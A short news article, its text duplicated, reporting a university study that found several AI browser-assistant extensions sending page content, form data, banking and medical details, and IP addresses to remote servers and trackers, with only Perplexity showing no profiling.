19.08.2025 13:56:00
Дата публикации
A study by four universities at once — UC Davis (USA), University College London (UK), Universidad Carlos III de Madrid (Spain) and Mediterranea University of Reggio Calabria (Italy) — has revealed large-scale data leaks through AI assistants in browsers.
We are talking about popular extensions like Merlin, Monica, Sider, TinaMind and ChatGPT for Google. They promise help with navigation and content analysis, but in return they get access to all your online activity.
Scientists modeled the behavior of an ordinary user — from searching for information to online banking — and found that assistants transmit the full HTML content of pages to servers, including autofill form data.
In the case of Merlin, even online banking details and medical information were recorded. Some extensions continued to collect data even in incognito mode.
Sider and TinaMind also shared IP addresses and user queries with external trackers, including Google Analytics, which creates conditions for cross-site tracking.
Most assistants do not use local models, but work through remote APIs that can be called automatically - without explicit user action.
Some tools analyze behavior and build a demographic profile: age, gender, income, interests. This data is used to personalize responses.
Only one assistant - Perplexity - showed no signs of collecting data for profiling. The rest violate basic privacy expectations.
The authors emphasize that such practices require urgent regulatory oversight. In the EU and the UK, they would likely violate standards such as GDPR.
Users should carefully study the permissions of browser extensions and avoid those that work through third-party servers without transparent usage policies. An AI assistant should not become a digital spy.
We are talking about popular extensions like Merlin, Monica, Sider, TinaMind and ChatGPT for Google. They promise help with navigation and content analysis, but in return they get access to all your online activity.
Scientists modeled the behavior of an ordinary user — from searching for information to online banking — and found that assistants transmit the full HTML content of pages to servers, including autofill form data.
In the case of Merlin, even online banking details and medical information were recorded. Some extensions continued to collect data even in incognito mode.
Sider and TinaMind also shared IP addresses and user queries with external trackers, including Google Analytics, which creates conditions for cross-site tracking.
Most assistants do not use local models, but work through remote APIs that can be called automatically - without explicit user action.
Some tools analyze behavior and build a demographic profile: age, gender, income, interests. This data is used to personalize responses.
Only one assistant - Perplexity - showed no signs of collecting data for profiling. The rest violate basic privacy expectations.
The authors emphasize that such practices require urgent regulatory oversight. In the EU and the UK, they would likely violate standards such as GDPR.
Users should carefully study the permissions of browser extensions and avoid those that work through third-party servers without transparent usage policies. An AI assistant should not become a digital spy.